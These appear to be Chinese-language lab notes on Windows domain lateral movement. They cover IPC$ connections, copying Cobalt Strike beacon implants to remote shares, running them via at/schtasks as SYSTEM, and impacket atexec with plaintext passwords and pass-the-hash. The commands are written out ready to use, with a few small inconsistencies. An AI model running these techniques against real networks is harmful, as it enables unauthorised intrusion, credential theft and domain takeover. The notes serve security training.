0x00 内网横向移动介绍
内网横向移动是什么
在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器
信息搜集
需要收集用户 网络 凭据等信息
net time /domain 判断是否有域
net user/domain 判断域内用户
ping OWA2010CN-God.god.org 判断dc ip
nslookup OWA2010CN-God.god.org
网络(存活主机货端口)
nmap或cs内的插件等工具
cs扫描后存活主机会在视图 -目录列表中显示
凭据
mimikatz或cs内的插件等工具
使用cs抓取时会在视图 -密码凭证中显示,可以抓取明文密码也可以抓取hash,必须是这台电脑有的密码(登录过或设置过)
IPC是专用管道,可以实现对远程计算机的访问,需要使用目标系统用户的账号密码,使用139、445端口
IPC利用步骤:
1.建立ipc连接到目标主机
2.拷贝木马到目标主机
3.建立计划任务(at、schtasks)执行木马
4.删除ipc及计划任务
建立ipc连接的命令
net use \\server\ipc$ "password" /user:username # 工作组
net use \\server\ipc$ "password" /user:domain\username #域内
dir \\xx.xx.xx.xx\C$\ # 查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat # 下载文件
copy 1.bat \\xx.xx.xx.xx\C$ # 复制文件
net use \\xx.xx.xx.xx\C$\1.bat /del # 删除IPC
net view xx.xx.xx.xx # `在这里插入代码片`查看对方共享
复现环境:
god.org 域
0x01横向移动ipc命令
注意在cs中建立ipc连接时需要在前面加shell
win<win2012 at
net use \\192.168.3.21\ipc$ "Admin12345"/user:god.org\administrator # 建立ipc连接
copy beacon.exe \\192.168.3.21\c$ #拷贝执行文件到目标机器
at \\192.168.3.21 14:32 c:\beacon.exe #添加计划任务
win>=win2012 schtasks
net use \\192.168.3.32\ipc$ "Admin12345" /user:god.org\administrator # 建立ipc连接
copy beacon.exe \\192.168.3.32\c$ #复制文件到其C盘
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn artfiact /sc DAILY /tr c:\artfiact.exe /F #创beacon任务对应执行文件
schtasks /run /s 192.168.3.32 /tn artfiact /i #运行beacon任务
schtasks /delete /s 192.168.3.21 /tn beacon /f#删除beacon任务
cs上线:
不能直接和cs服务端直接通信
1.正向连接
生成正向木马,直接连接
新建监听器 beacon_tcp(正向)
生成木马(后门类型 stageless),执行木马
connect 192.168.3.21 4444
2.反向连接
代理转发-转发上线
新建一个监听器,利用这个监听器上线
生成木马绑定这个监听器(后门是stageless),执行木马
0x02内网横向移动ipc cs插件
0x03内网横向移动ipc impacket套件 atexec
1.py版本
python需要先安装impacket库
cs开启socks代理
使用全局代理工具proxyfilter
新建代理服务器,连的是cs服务器的ip
设置代理服务规则
明文
本地用户
python atexec.py god/administrator:Admin12345@192.168.3.21 "whoami"
域内用户
python atexec.py ./administrator:Admin12345@192.168.3.21 "whoami"
hash值
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"
2.exe版本(cs中使用,不推荐,文件较大)
明文
本地用户
shell atexec.exe ./administrator:Admin12345@192.168.3.21 "whoami"
域内用户
shell atexec.exe god/administrator:Admin12345@192.168.3.21 "whomai"
hash
shell atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"
可能会出现smbsessionerror,注意输入的密码是否正确
这里可以利用此工具让目标主机远程下载木马上线,需要把木马放到能出网的web服务器上
cs是不用添加路由,和msf不一样,默认就已经添加了